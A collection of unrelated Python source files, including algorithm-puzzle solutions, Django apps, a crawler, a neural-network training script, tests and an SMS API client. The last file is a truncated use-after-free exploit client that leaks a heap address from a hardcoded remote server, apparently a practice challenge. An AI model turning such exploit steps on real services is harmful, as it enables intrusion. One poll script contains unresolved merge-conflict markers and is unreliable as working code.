text stringlengths 8 6.05M |
|---|
###########################
# project_euler number 3
# by 김승현
###########################
# Q. 가장 큰 소인수 구하기
N = 600851475143
div = 2
# 소수 찾기
while N != 1:
if N % div == 0:
N = N / div
else:
div = div + 1
print(div) |
def double_every_other(lst):
return [x if c%2==0 else x*2 for c,x in enumerate(lst)]
'''
Write a function, that doubles every second integer in a list starting from the left.
'''
|
# -*- coding:utf-8 -*-
import os
import glob
current_path = os.path.dirname(os.path.realpath(__file__))
def storage_path(file_path=""):
return os.path.join(base_path("storage"), file_path)
def base_path(file_path=""):
return os.path.join(current_path, file_path)
def get_faces():
return glob.glob(storage_path("images\\faces\\*.jpg"))
def get_dlib_model(model_file_name):
return os.path.join(storage_path("model"), model_file_name)
if __name__ == '__main__':
print(base_path("asd"))
print(storage_path("asd"))
|
from django.http.response import HttpResponse
from django.shortcuts import redirect, render
from meetups.admin import MeetupAdmin
from .forms import RegistrationForm
from .models import Meetup, Participant
# Create your views here.
def index(request):
meetups = Meetup.objects.all()
return render(request, 'meetups/index.html',
{
'show_meetups': True,
'meetups': meetups
})
def details(request, meetup_slug):
try:
selected_meetup = Meetup.objects.get(slug=meetup_slug)
if request.method == "GET":
regisration_form = RegistrationForm()
if request.method == "POST":
regisration_form = RegistrationForm(request.POST)
if regisration_form.is_valid():
participant_username = regisration_form.cleaned_data['username']
participant_email = regisration_form.cleaned_data['email']
try:
participant_found = Participant.objects.get(username=participant_username)
print(participant_found)
selected_meetup.participant.add(participant_found)
return redirect('confirmation', meetup_slug=meetup_slug)
except:
participant = Participant.objects.create(username=participant_username, email=participant_email)
selected_meetup.participant.add(participant)
return redirect('confirmation', meetup_slug=meetup_slug)
return render(request, 'meetups/meetup-details.html', {
'meetup': selected_meetup,
'meetup_found': True,
'form': regisration_form
})
except Exception as exp:
return render(request, 'meetups/meetup-details.html', {'meetup': None, 'meetup_found': False})
def confirmation(request, meetup_slug):
meetup = Meetup.objects.get(slug=meetup_slug)
return render(request, 'meetups/registration-success.html', {'organizer_email': meetup.organizer_email})
|
'''
1. 首先需要丢弃字符串前面的空格;
2. 然后可能有正负号(注意只取一个,如果有多个正负号,那么说这个字符串是无法转换的,返回0 比如测试用例里就有个“+-2”);
3. 字符串可以包含0~9以外的字符,如果遇到非数字字符,那么只取该字符之前的部分,如“-00123a66”返回为“-123”;
4. 如果超出int的范围,返回边界值(2147483647或-2147483648)。
5. 注意字符转化为整数的方法, digit = ord(str[i]) - ord('0') 此点一定要记住
'''
class Solution:
def myAtoi(self, str: str) -> int:
str = str.strip() # 记住要先去除空格
if str is None or len(str) == 0:
return 0
result , i = 0 , 0
flag = True
if str[0] == '-':
flag = False
i = i + 1 # 没有 i ++的写法
elif str[0] == '+':
i = i + 1
while i < len(str):
digit = ord(str[i]) - ord('0') # 字符转数字
if digit < 0 or digit > 9:
return result
if flag:
result = result * 10 + digit
if result > 2**31 - 1:
return 2**31 - 1
else:
result = result * 10 - digit
if result < -2**31:
return -2**31
i = i + 1
return result |
import sys, os
from socket import *
if(len(sys.argv)>2):
host=sys.argv[1]
port=int(sys.argv[2])
else:
print("Unable to create connection, required parameters 'Host' and/or 'Port' where not provided")
sys.exit(1)
server_address=gethostbyname(host)
connection_socket=socket(AF_INET,SOCK_STREAM)
connection_socket.connect((server_address,port))
pid=os.fork()
if pid!=0:
incoming_stream=connection_socket.makefile("r")
print("Client - Client is accepting server messages")
while True:
msg=incoming_stream.readline()
print(msg)
if msg=="salir\n":
break
incoming_stream.close()
connection_socket.close()
print("Server disconnected, if you are not disconnected type 'salir'")
os.waitpid(pid,0)
else:
outgoing_stream=connection_socket.makefile("w")
print("Client - Server is accepting client messages")
while True:
msg=input()
outgoing_stream.write(msg+"\n")
outgoing_stream.flush()
if msg=="salir\n":
break
outgoing_stream.close()
connection_socket.close()
sys.exit(0)
|
from flask import Flask, g, current_app
from flask_sqlalchemy import SQLAlchemy
from . import config
app = Flask(__name__)
db = SQLAlchemy()
def create_app():
app.config.from_object(config.Config)
db.init_app(app)
with app.app_context():
# Imports
from resourse.api import courseBp, fileBp, authBp, checkBp
app.register_blueprint(courseBp.coursebp)
app.register_blueprint(authBp.authbp)
app.register_blueprint(fileBp.filebp)
app.register_blueprint(checkBp.checkbp)
# Create tables for our models
db.create_all()
return app
|
# coding=utf-8
from mongo_YouKu import MongoUrlManager
from crawler_YouKu import Crawler_YouKu
import time
import os
mongo_mgr = MongoUrlManager()
root_url = "https://list.youku.com/category/show/c_100.html"
mongo_mgr.enqueueUrl(root_url, 0)
while True:
record = mongo_mgr.dequeueUrl()
if record == None:
print("数据库为空, 程序退出")
break
url = record['url']
depth = record['depth']
crawler = Crawler_YouKu(url)
if depth == 0:
crawler.get_label_1()
for href, region in crawler.label_1_List:
mongo_mgr.enqueueUrl(href, 1, region)
mongo_mgr.finishUrl(url)
elif depth == 1:
region = record['region']
crawler.get_label_2()
for href, type in crawler.label_2_List:
mongo_mgr.enqueueUrl(href, 2, region, type)
mongo_mgr.finishUrl(url)
elif depth == 2:
region = record["region"]
type = record["type"]
fileTmp = region + "_" + type + ".txt"
fileDir = os.path.join("优酷_Corpus", "动漫")
if not os.path.exists(fileDir):
os.makedirs(fileDir)
fileName = os.path.join(fileDir, fileTmp)
crawler.get_movieName()
with open(fileName, "w", encoding="utf-8") as fw:
for name in crawler.contents:
fw.write(name + "\n")
mongo_mgr.enqueueItems(region, type, name)
crawler.close_driver()
time.sleep(0.2)
|
# Generated by Django 3.0.6 on 2020-05-24 16:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20200521_1203'),
]
operations = [
migrations.AddField(
model_name='keyword',
name='today',
field=models.BooleanField(default=False, verbose_name='오늘만 보이게 하려면 체크'),
),
migrations.AlterField(
model_name='keyword',
name='is_show',
field=models.BooleanField(default=False, verbose_name='다른 제시어 표시 변수, 건드리지 말자'),
),
]
|
# 一维排序后,转换为LIS问题
class Solution:
def findLongestChain(self, pairs: List[List[int]]) -> int:
pairs.sort(key=lambda x : (x[0], x[1]))
n = len(pairs)
dp = [1]*n
for i in range(n):
for j in range(i):
if pairs[i][0] > pairs[j][1]:
dp[i] = max(dp[i], dp[j] + 1)
return max(dp)
# 按第二维排序,因为第一维小于第二维,所以直接贪心即可
class Solution:
def findLongestChain(self, pairs: List[List[int]]) -> int:
pairs.sort(key=lambda x : x[1])
n = len(pairs)
res, temp = 1, pairs[0][1]
for i in range(1, n):
if pairs[i][0] > temp:
res += 1
temp = pairs[i][1]
return res |
class Solution:
def minimalKSum(self, nums: List[int], k: int) -> int:
nums.sort()
cnt, res = 0, 0
left = 0
for item in nums:
if cnt == k:
break
if item > (left + 1):
temp = min(item - left - 1, k - cnt)
cnt += temp
res += (left + 1 + left + temp) * temp // 2
left = item
if cnt < k:
res += (nums[-1] + 1 + nums[-1] + k - cnt) * (k - cnt) // 2
return res |
#!/usr/bin/env python
import logging
import theano
from argparse import ArgumentParser
from theano import tensor
from blocks.algorithms import GradientDescent, Adam
from blocks.bricks import MLP, Identity, Sigmoid, Softmax
from blocks.bricks.cost import CategoricalCrossEntropy, MisclassificationRate
from blocks.initialization import Uniform, IsotropicGaussian, Constant
from fuel.streams import DataStream
from fuel.datasets import MNIST
from fuel.schemes import SequentialScheme
from fuel.transformers import Mapping
from blocks.graph import ComputationGraph
from blocks.model import Model
from blocks.extensions import FinishAfter, Timing, Printing
from blocks.extensions.monitoring import (DataStreamMonitoring,
TrainingDataMonitoring)
from blocks.extensions.plot import Plot
from blocks.main_loop import MainLoop
from blocks_contrib.bricks.filtering import SparseFilter, VarianceComponent
from blocks_contrib.extensions import DataStreamMonitoringAndSaving
from blocks_contrib.utils import batch_normalize
mnist = MNIST('train', sources=['features'])
data, _ = mnist._load_mnist()
means = data.mean(axis=0)
def _meanize(data):
newfirst = data[0] - means[None, :]
return (newfirst, data[1])
def main(save_to, num_epochs):
dim = 400
n_steps = 100
batch_size = 100
filtering = SparseFilter(dim=dim, input_dim=784, batch_size=batch_size, n_steps=n_steps,
weights_init=IsotropicGaussian(.01), biases_init=Constant(0.))
filtering.initialize()
causes = VarianceComponent(dim=9, input_dim=dim, n_steps=n_steps, batch_size=batch_size,
layer_below=filtering,
weights_init=IsotropicGaussian(.01), # Uniform(.1, .001),
use_bias=False)
causes.initialize()
clf = MLP([Sigmoid(), Softmax()], [dim, dim, 10],
weights_init=IsotropicGaussian(0.01),
use_bias=False, name="clf")
clf.initialize()
x = tensor.matrix('features')
y = tensor.lmatrix('targets')
cost1, code_1, rec_1 = filtering.cost(inputs=x, prior=0)
cost2, code_2, rec_2 = causes.cost(prev_code=code_1, prior=0)
cost1, code_1, rec_1 = filtering.cost(inputs=x, prior=0,
gamma=theano.gradient.disconnected_grad(rec_2))
cost2, code_2, rec_2 = causes.cost(prev_code=code_1, prior=0)
cost = cost1 + cost2 + 0*y.sum()
probs = clf.apply(code_1)
nll = CategoricalCrossEntropy().apply(y.flatten(), probs)
clf_error_rate = MisclassificationRate().apply(y.flatten(), probs)
cost += nll
cost.name = 'final_cost'
cg = ComputationGraph([cost, clf_error_rate])
new_cg = cg
# new_cg = batch_normalize(clf.linear_transformations, cg)
mnist_train = MNIST("train", stop=50000)
mnist_valid = MNIST("train", start=50000, stop=60000)
mnist_test = MNIST("test")
trainstream = Mapping(DataStream(mnist_train,
iteration_scheme=SequentialScheme(
mnist_train.num_examples, 100)),
_meanize)
teststream = Mapping(DataStream(mnist_test,
iteration_scheme=SequentialScheme(
mnist_test.num_examples, 100)),
_meanize)
validstream = Mapping(DataStream(mnist_valid,
iteration_scheme=SequentialScheme(
mnist_test.num_examples, 100)),
_meanize)
algorithm = GradientDescent(
cost=new_cg.outputs[0], params=new_cg.parameters,
step_rule=Adam())
main_loop = MainLoop(
algorithm,
trainstream,
extensions=[Timing(),
FinishAfter(after_n_epochs=num_epochs),
DataStreamMonitoring(
new_cg.outputs,
teststream,
prefix="test"),
DataStreamMonitoringAndSaving(
new_cg.outputs,
validstream,
[filtering, causes, clf],
'best_'+save_to+'.pkl',
cost_name='error_rate',
after_epoch=True,
prefix='valid'
),
TrainingDataMonitoring(
new_cg.outputs,
prefix="train",
after_epoch=True),
# Plot(
# save_to,
# channels=[
# ['test_final_cost',
# 'test_misclassificationrate_apply_error_rate'],
# ['train_total_gradient_norm']]),
Printing()])
main_loop.run()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
parser = ArgumentParser("An example of training an MLP on"
" the MNIST dataset.")
parser.add_argument("--num-epochs", type=int, default=2,
help="Number of training epochs to do.")
parser.add_argument("save_to", default="mnist.pkl", nargs="?",
help=("Destination to save the state of the training "
"process."))
args = parser.parse_args()
main(args.save_to, args.num_epochs)
|
from __future__ import unicode_literals
from django.db import models
from .member import Member
from rest_framework.exceptions import NotFound
# Create your models here.
class Item(models.Model):
uploaded_by = models.ForeignKey(Member, on_delete=models.CASCADE)
item_name = models.CharField(max_length=200, null=True)
item_category = models.CharField(max_length=200,default="")
is_found = models.BooleanField(default=False)
item_image = models.ImageField()
def __str__(self):
return self.item_name
@classmethod
def get_item_obj(cls, id):
try:
item_obj = cls.objects.get(id=id)
return item_obj
except cls.DoesNotExist:
raise NotFound("Item not found")
@classmethod
def create_item(cls,item_name,item_category,uploaded_by,image):
try:
item_obj = cls.objects.create(
item_name=item_name,
item_category=item_category,
uploaded_by = Member.objects.get(username=uploaded_by),
item_image = image
)
return item_obj
except cls.DoesNotExist:
raise NotFound("Item not found")
@classmethod
def get_item_details(cls, id):
try:
item_obj = cls.objects.get(id=id)
obj = {
"image":item_obj.item_image
}
return obj
except cls.DoesNotExist:
raise NotFound("User not found")
|
"""Tests for ``tinyflow.ops``."""
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
import inspect
import operator as op
import os
import pytest
from tinyflow import _testing, exceptions, ops, Pipeline, tools
def test_default_description():
tform = ops.flatten()
assert repr(tform) == tform.description
def test_description():
tform = 'description' >> ops.flatten()
assert tform.description == 'description'
def test_Operation_abc():
"""An operation without ``__call__()`` is invalid."""
with pytest.raises(NotImplementedError):
ops.Operation()([])
@pytest.mark.parametrize("pool", ['thread', 'process'])
def test_Operation_no_pool(pool):
class Op(ops.Operation):
def __init__(self, pool):
self._pool = pool
def __call__(self, stream):
if self._pool == 'process':
self.pipeline.process_pool
elif self._pool == 'thread':
self.pipeline.thread_pool
else:
raise RuntimeError('uh ...')
p = Pipeline() | Op(pool)
with pytest.raises(exceptions.NoPool):
p([])
def test_Operation_no_pipeline():
class Op(ops.Operation):
def __init__(self):
self.pipeline
def __call__(self, stream):
pass
with pytest.raises(exceptions.NoPipeline):
Op()
@pytest.mark.parametrize("operation,input_data,expected", [
(ops.chunk(2),
(1, 2, 3, 4),
((1, 2), (3, 4))),
(ops.chunk(2),
(1, 2, 3, 4, 5),
((1, 2), (3, 4), (5,))),
(ops.counter(),
(1, 1, 2, 2, 4, 4, 5),
((1, 2), (2, 2), (4, 2), (5, 1))),
(ops.counter(3),
(1, 1, 2, 2, 4, 4, 5),
((1, 2), (2, 2), (4, 2))),
(ops.drop(2),
range(5),
(2, 3, 4)),
(ops.flatten(),
((1, 2), (3, 4)),
(1, 2, 3, 4)),
(ops.filter(),
(0, 1, 2, None, 4),
(1, 2, 4)),
(ops.filter(filterfalse=True),
(0, 1, 2, None, 4),
(0, None)),
(ops.filter(bool),
(0, 1, 2, None, 4),
(1, 2, 4)),
(ops.itemgetter(0),
((0, 1), (1, 2)),
(0, 1)),
(ops.itemgetter(slice(1, 3)),
((0, 1, 2, 3), (4, 5, 6, 7)),
((1, 2), (5, 6))),
(ops.map(lambda x: x ** 2),
(2, 4, 8),
(4, 16, 64)),
(ops.map(op.methodcaller('upper'), flatten=True),
['w1', 'w2'],
['W', '1', 'W', '2']),
(ops.methodcaller('split', ',', 1),
('a,b,c', 'a'),
(['a', 'b,c'], ['a'])),
(ops.windowed_op(2, reversed),
(1, 2, 3, 4, 5),
(2, 1, 4, 3, 5)),
(ops.windowed_reduce(2, op.iadd),
(1, 2, 3, 4, 5),
(3, 7, 5)),
(ops.sort(),
(2, 3, 1),
(1, 2, 3)),
(ops.sort(reverse=True),
(2, 3, 1),
(3, 2, 1)),
(ops.sort(key=op.itemgetter(0), reverse=True),
((1, 'dog'), (3, 'cat'), (2, 'fish')),
((3, 'cat'), (2, 'fish'), (1, 'dog'))),
(ops.take(2),
range(5),
(0, 1)),
(ops.wrap(reversed),
(1, 2, 3),
(3, 2, 1))])
def test_basic_operation(operation, input_data, expected):
"""A lot of operations take few arguments are generate an only slightly
altered output. Output and expected values are compared as tuples.
"""
assert isinstance(operation, ops.Operation)
assert tuple(operation(input_data)) == tuple(expected)
def test_reduce_by_key_exceptions():
with pytest.raises(ValueError):
ops.reduce_by_key(
None, None, copy_initial=True, deepcopy_initial=True)
@pytest.mark.parametrize('initial', [tools.NULL, 0, 10])
def test_reduce_by_key_wordcount(initial):
"""Tests ``keyfunc``, ``valfunc``, and ``initial``."""
data = ['word', 'something', 'else', 'word']
expected = {
'word': 2,
'something': 1,
'else': 1
}
if initial != tools.NULL:
expected = {k: v + initial for k, v in expected.items()}
o = ops.reduce_by_key(
op.iadd,
lambda x: x,
valfunc=lambda x: 1,
initial=initial)
assert expected == dict(o(data))
@pytest.mark.parametrize('kwargs', (
{'copy_initial': True},
{'deepcopy_initial': True}))
def test_reduce_by_key_initial_copier(kwargs):
data = [
['key1', 1],
['key', 1],
['key', 2],
]
expected = {
'key1': [None, 'key1', 1],
'key': [None, 'key', 1, 'key', 2]
}
o = ops.reduce_by_key(
op.iadd,
op.itemgetter(0),
initial=[None],
**kwargs)
actual = dict(o(data))
assert expected == actual
def _parametrize_test_map_star_args(pools, args):
"""Prepare parametrized arguments for ``test_map_star_args()`` to make
sure everything is tested across all pool types.
Takes args like:
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7])
and pools like:
[(ProcessPoolExecutor, 'process'), (ThreadPoolExecutor, 'thread')]
and produces:
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7], ProcessPoolExecutor, 'process')
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7], ThreadPoolExecutor, 'thread')
"""
for item in args:
for p in pools:
yield tuple(list(item) + list(p))
@pytest.mark.parametrize("func,argtype,data,expected,pool_class,pool_name",
list(_parametrize_test_map_star_args(
pools=[(ProcessPoolExecutor, 'process'), (ThreadPoolExecutor, 'thread')],
args=[
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7]),
(_testing.add2, '**kwargs', [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}], [3, 7]),
(_testing.add4, '*args**kwargs', [((1, 2), {'c': 3, 'd': 4}), ((5, 6), {'c': 7, 'd': 8})], [10, 26])
])))
def test_map_arg_types_and_pools(
func, argtype, data, expected, pool_class, pool_name):
"""Every argument type should work with every pool type."""
p = Pipeline() | ops.map(func, argtype=argtype, pool=pool_name)
with pool_class(4) as pool:
kwargs = {'{}_pool'.format(pool_name): pool}
actual = p(data, **kwargs)
# Cast both outputs to list and sort actual since it may be out of
# order after mapping in parallel.
assert list(expected) == sorted(actual)
def test_map_exceptions():
# Bad argtype
with pytest.raises(ValueError):
ops.map(lambda x: x, argtype=None)
# Bad pool
p = Pipeline() | ops.map(lambda x: x, pool='trash')
with pytest.raises(ValueError):
p([])
def test_cat():
with open('LICENSE.txt') as f:
for e, a in zip(f, ops.cat()(['LICENSE.txt'])):
assert e == a
def test_module_all():
"""Make sure all the operations are registered in
``tinyflow.ops.__all__``.
This test may need to be modified if any objects that don't subclass
``tinyflow.ops.Operation()`` are added to this module.
"""
# Ensure everything in '__all__' is present
for item in ops.__all__:
assert issubclass(getattr(ops, item), ops.Operation)
# Ensure all 'Operation()' subclasses are listed in '__all__'.
for cls in ops.Operation.__subclasses__():
if os.path.join('tinyflow/tests') in inspect.getfile(cls):
continue
assert cls.__name__ in ops.__all__
|
from django.db.models.signals import post_save #apps ability to save new users
from django.contrib.auth.models import User
from django.dispatch import receiver #making receiver
from .models import Profile #when we make a user, make a profile
@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
"""
receiver decorater:
post_save: a signal. once a user is saved, create_profile gets User info
sender: this will be the user informaion
This decorater is passed in with create_profile
Imports:
All: defined when passed with receiver decorater, implecitly
sender: passed with receiver
instance: once the user exist. passed in from @receiver
created: if user is created, make a profile to match. from @receiver
kwargs:
"""
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_profile(sender, instance, **kwargs):
"""
receiver decorater:
post_save: once the information is posted
sender: this will be the user informaion
This decorater is passed in with create_profile
Imports:
All: defined when passed with receiver decorater, implecitly
sender: passed with receiver
instance: will update profile
kwargs:
"""
instance.profile.save()
|
def check(string):
count = 0
for i in range(len(string)-6):
if string[i] == 'a' and string[i+1] == 'b' and string[i+2] == 'a' and string[i+3] == 'c' and string[i+4] == 'a' and string[i+5] == 'b' and string[i+6] == 'a':
count += 1
return count
t = int(input())
while t > 0:
pat = 'abacaba'
n = int(input())
s = str(input())
flag = 0
for i in range(0,n-6,+1):
ss = list(s)
cur = 1
for j in range(7):
if ss[i+j] != '?' and ss[i+j] != pat[j]:
cur = 0
break
else:
ss[i+j] = pat[j]
if cur == 1 and check(ss) == 1:
for k in range(len(s)):
if ss[k] == '?':
ss[k] = 'z'
flag = 1
print("Yes")
print(''.join(ss))
if flag == 0:
print("No")
t = t-1
|
import unittest
from Data_work import *
class tests(unittest.TestCase):
def test_grade_func(self):
self.assertEquals(0, test_grades(['A', 'A', 'A', 'A']))
self.assertEquals(-1, test_grades(['A', 'B', 'C']))
self.assertEquals(1, test_grades(['C', 'A', 'B']))
self.assertEquals(0, test_grades(['A']))
|
import uuid
from django.db import models
from django.contrib.auth.models import User
from basketball.models import GAME_TYPES, SCORE_TYPES, Season
PERMISSION_TYPES = [
('read', 'Read'),
('edit', 'Edit'),
('admin', 'Admin')
]
class Group(models.Model):
name = models.CharField(max_length=60, blank=False)
admin = models.ManyToManyField('auth.User', related_name='admin_groups', blank=True)
members = models.ManyToManyField('auth.User', related_name='member_groups', blank=True)
# default game settings
game_type = models.CharField(max_length=30, choices=GAME_TYPES, null=True)
score_type = models.CharField(max_length=30, choices=SCORE_TYPES, null=True)
ft_enabled = models.BooleanField(help_text="Enable FT tracking", default=False)
points_to_win = models.CharField(max_length=30, choices=(('11','11'), ('30','30'), ('other','Other')), default='other', null=True)
team1_name = models.CharField(max_length=64, blank=False, default="Away")
team2_name = models.CharField(max_length=64, blank=False, default="Home")
#leaderboard settings
possessions_min = models.PositiveIntegerField(default=100)
fga_min = models.PositiveIntegerField(default=15)
def __str__(self):
return "%s" % (self.name)
def checkUserPermission(self, user, permission):
# Always approve the 'master' user
if user.id == 1:
return True
if user.is_anonymous:
return False
for group_permission in user.group_permissions.all():
if group_permission.group_id == self.id and group_permission.permission == permission:
return True
return False
def getSeasons(self):
group_season_pks = []
for season in Season.objects.all():
if self.game_set.filter(date__range=(season.start_date, season.end_date)):
group_season_pks.append(season.id)
seasons = Season.objects.filter(pk__in=group_season_pks).order_by('-start_date')
return seasons
class MemberPermission(models.Model):
group = models.ForeignKey(Group, on_delete=models.CASCADE, blank=True, null=True)
user = models.ForeignKey('auth.User', on_delete=models.CASCADE, related_name='group_permissions')
permission = models.CharField(max_length=30, choices=PERMISSION_TYPES, null=True)
player = models.ForeignKey('basketball.Player', on_delete=models.CASCADE, blank=True, null=True)
def __str__(self):
return "%s - %s" % (self.group.name, self.user.username)
class Meta():
unique_together = ("group", "user")
class MemberProfile(models.Model):
"""Member profile is used to store some more information about the users"""
user = models.OneToOneField('auth.User', on_delete=models.CASCADE, editable=False)
zip = models.CharField(max_length=5,null=True)
def __str__(self):
return "%s - %s" % (self.user.username,self.user.last_name)
#def get_absolute_url(self):
# return reverse("profile_stats",kwargs={'id':self.id})
#def save(self,*args,**kwargs):
# super(MemberProfile,self).save(*args,**kwargs)
class MemberInvite(models.Model):
group = models.ForeignKey('base.Group', on_delete=models.CASCADE)
email = models.EmailField()
permission = models.CharField(max_length=30, choices=PERMISSION_TYPES, null=True)
player = models.PositiveIntegerField(blank=True, null=True)
code = models.UUIDField(default=uuid.uuid4, editable=False)
active = models.BooleanField(default=True)
creation_date = models.DateField(auto_now_add=True, null=True)
def __str__(self):
return "%s - %s" % (self.group.name, self.email)
class Contact(models.Model):
creation_date = models.DateField(auto_now_add=True, null=True, blank=True)
user = models.ForeignKey('auth.User', on_delete=models.CASCADE, null=True, blank=True)
email = models.EmailField()
subject = models.CharField(max_length=120)
message = models.TextField()
def __str__(self):
return "%s - %s" % (self.creation_date, self.email)
|
# -*- coding: utf-8 -*-
import base64
import hmac
import hashlib
import json
import urllib
import urllib2
from datetime import datetime as dt
from logger import Logger
class SmsClient(object):
"""
通过电信 API 发送短信
"""
def __init__(self, app_id=None, app_secret=None, grant_type='client_credentials'):
'''
:param app_id: app_id 在电信app 控制台可以查询到
:param app_secret: 同上
:param grant_type: 授权方法,目前只写了 client_credentials
:return:
'''
super(SmsClient, self).__init__()
self.APP_ID = app_id
self.APP_SECRET = app_secret
self.GRANT_TYPE = grant_type
def _get_time_stamp(self):
timestamp = dt.now().year, dt.now().month, dt.now().day, dt.now().hour, dt.now().minute, dt.now().second
timestamp = "%s-%s-%s %s:%s:%s" % timestamp
return timestamp
def _get_access_token(self):
url = 'https://oauth.api.189.cn/emp/oauth2/v3/access_token'
param = {'grant_type': self.GRANT_TYPE, 'app_id': self.APP_ID, 'app_secret': self.APP_SECRET}
param = urllib.urlencode(param)
req = urllib2.Request(url, param)
response = urllib2.urlopen(req).read()
result = json.loads(response)
if result['res_code'] == '0':
Logger.info(result)
return result['access_token']
else:
Logger.error(result)
def send_sms(self, template_id, template_param, acceptor_tel):
'''
:param template_id: 模版短信 ID
:param template_param: 模版短信参数,字典类型
:param acceptor_tel: 接收方号码,不支持0打头的号码
:return: 成功返回短信唯一表示, 错误打印 log
'''
url = 'http://api.189.cn/v2/emp/templateSms/sendSms'
param = {'app_id': self.APP_ID,
'access_token': self._get_access_token(),
'acceptor_tel': acceptor_tel,
'template_id': template_id,
'template_param': template_param,
'timestamp': self._get_time_stamp(),
}
param = urllib.urlencode(param)
req = urllib2.Request(url, param)
response = urllib2.urlopen(req).read()
result = json.loads(response)
if result['res_code'] == 0:
Logger.info(result)
return result['idertifier']
else:
Logger.error(result)
def send_sms_by_list(self, template_id, template_param, tel_list):
'''
按照列表群发
:param template_id: 模版短信 ID
:param template_param: 模版短信参数,字典类型
:param tel_list: 接收方电话号码组成的 list
:return: idertifier 组成的 list,idertifier 为电信返回的短信唯一标示
'''
result = []
for tel in tel_list:
iden = self.send_sms(template_id, template_param, tel)
result.append(iden)
return result
def msg_status(self, identifier):
url = 'http://api.189.cn/v2/EMP/nsagSms/appnotify/querysmsstatus'
message = 'access_token=%s&app_id=%s&identifier=%s×tamp=%s' % (self._get_access_token(), self.APP_ID, identifier, self._get_time_stamp())
message = bytes(message).encode('utf-8')
secret = bytes(self.APP_SECRET).encode('utf-8')
sign = base64.b64encode(hmac.new(message, secret, digestmod=hashlib.sha1).digest())
print message, sign
param = {'access_token': self._get_access_token(),
'app_id': self.APP_ID,
'identifier': identifier,
'timestamp': self._get_time_stamp(),
'sign': sign,
}
param = urllib.urlencode(param)
req = urllib2.Request(url, param)
response = urllib2.urlopen(req).read()
result = json.loads(response)
if result['res_code'] == '0':
Logger.info(result)
else:
Logger.error(result)
|
# Modules
import os
import csv
# Path to collect data from the Resources folder
elections = os.path.join('Resources', 'election_data.csv')
electionDataCsv = csv.reader(open(elections))
header = next(electionDataCsv)
# Define Variables
totalVotes = 0
khanVotes = 0
correyVotes = 0
liVotes = 0
otooleyVotes = 0
# Define candiates list
candidates = ["Khan", "Correy", "Li", "O'Tooley"]
# Loop through the data
for row in electionDataCsv:
# Find total votes
totalVotes = totalVotes + 1
# Count khanVotes
if row[2] == candidates[0]:
khanVotes = khanVotes + 1
# Count correyVotes
if row[2] == candidates[1]:
correyVotes = correyVotes + 1
# Count liVotes
if row[2] == candidates[2]:
liVotes = liVotes + 1
# Count otooleyVotes
if row[2] == candidates[3]:
otooleyVotes = otooleyVotes + 1
# Determine winner
if khanVotes > correyVotes & khanVotes > liVotes & khanVotes > otooleyVotes:
winner = "Khan"
elif correyVotes > khanVotes & correyVotes > liVotes & correyVotes > otooleyVotes:
winner = "Correy"
elif liVotes > correyVotes & liVotes > correyVotes & liVotes > otooleyVotes:
winner = "Li"
elif otooleyVotes > khanVotes & otooleyVotes > correyVotes & otooleyVotes > liVotes:
winner = "O\'Tooley"
# Define vote percentages
khanPercent = (khanVotes / totalVotes * 100)
correyPercent = (correyVotes / totalVotes * 100)
liPercent = (liVotes / totalVotes * 100)# Define vote percentages
otooleyPercent = (otooleyVotes / totalVotes * 100)
<<<<<<< HEAD
# Print to terminal
print(f'Election Results')
print(f'------------------------')
print(f'Total Votes: {totalVotes}')
print(f'------------------------')
print(f'Khan: {khanPercent:.2f}% ({khanVotes})')
print(f'Correy: {correyPercent:.2f}% ({correyVotes})')
print(f'Li: {liPercent:.2f}% ({liVotes})')
print(f'O\'Tooley: {otooleyPercent:.2f}% ({otooleyVotes})')
print(f'------------------------')
print(f'Winner: {winner}')
print(f'------------------------')
# Print to file
print(f'Election Results', file=open("PyPollReults.txt", "a"))
print(f'------------------------', file=open("PyPollReults.txt", "a"))
print(f'Total Votes: {totalVotes}', file=open("PyPollReults.txt", "a"))
print(f'------------------------', file=open("PyPollReults.txt", "a"))
print(f'Khan: {khanPercent:.2f}% ({khanVotes})', file=open("PyPollReults.txt", "a"))
print(f'Correy: {correyPercent:.2f}% ({correyVotes})', file=open("PyPollReults.txt", "a"))
print(f'Li: {liPercent:.2f}% ({liVotes})', file=open("PyPollReults.txt", "a"))
print(f'O\'Tooley: {otooleyPercent:.2f}% ({otooleyVotes})', file=open("PyPollReults.txt", "a"))
print(f'------------------------', file=open("PyPollReults.txt", "a"))
print(f'Winner: {winner}', file=open("PyPollReults.txt", "a"))
print(f'------------------------', file=open("PyPollReults.txt", "a"))
=======
# Create print function for file output
def resultsFile():
# Print results
print(f'Election Results', file=open("PyPollResults.txt", "a"))
print(f'------------------------', file=open("PyPollResults.txt", "a"))
print(f'Total Votes: {totalVotes}', file=open("PyPollResults.txt", "a"))
print(f'------------------------', file=open("PyPollResults.txt", "a"))
print(f'Khan: {khanPercent:.2f}% ({khanVotes})', file=open("PyPollResults.txt", "a"))
print(f'Correy: {correyPercent:.2f}% ({correyVotes})', file=open("PyPollResults.txt", "a"))
print(f'Li: {liPercent:.2f}% ({liVotes})', file=open("PyPollResults.txt", "a"))
print(f'O\'Tooley: {otooleyPercent:.2f}% ({otooleyVotes})', file=open("PyPollResults.txt", "a"))
print(f'------------------------', file=open("PyPollResults.txt", "a"))
print(f'Winner: {winner}', file=open("PyPollResults.txt", "a"))
print(f'------------------------', file=open("PyPollResults.txt", "a"))
resultsFile()
>>>>>>> aacea97042339d37ffd57d45f62efdf39554df61
|
# https://sensepost.com/blog/2017/linux-heap-exploitation-intro-series-used-and-abused-use-after-free/
import socket
import re
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('46.101.80.6', 10000)
sock.connect(server_address)
try:
# hello
data = sock.recv(1024)
print 'received: %s' % data
# options
data = sock.recv(1024)
print 'received: %s' % data
# print
sock.sendall("4")
# get address
data = sock.recv(1024)
print 'received: %s' % data
address = data.strip().split(" ")[4]
address = address.split("\n")[0]
address = int(address, 16)
print address
# free
data = sock.recv(1024)
print 'received: %s' % data
sock.sendall("2")
data = sock.recv(1024)
print 'received: %s' % data
# remalloc
data = sock.recv(1024)
